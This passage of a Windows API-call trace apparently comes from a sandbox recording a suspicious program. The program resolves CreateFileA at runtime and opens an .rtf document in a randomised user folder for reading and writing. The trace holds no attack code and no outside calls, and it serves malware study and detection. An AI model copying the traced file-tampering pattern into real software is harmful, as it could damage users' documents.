hHeap=0x8a0000) returned 1 [0172.098] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0172.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.098] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0172.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0172.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0172.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpUsedDefaultChar=0x0) returned 71 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.100] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\hqhniizhaa.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0172.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8e) returned 0x8edfa0 [0172.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=71, lpWideCharStr=0x8edfa0, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf") returned 71 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.109] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.111] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 1 [0172.111] TranslateMessage (lpMsg=0x87f3fc) returned 0 [0172.111] DispatchMessageW (lpMsg=0x87f3fc) returned 0x0 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.111] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea98) returned 1 [0172.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.115] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0172.115] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0172.115] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0172.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.116] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.117] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0172.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.118] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") 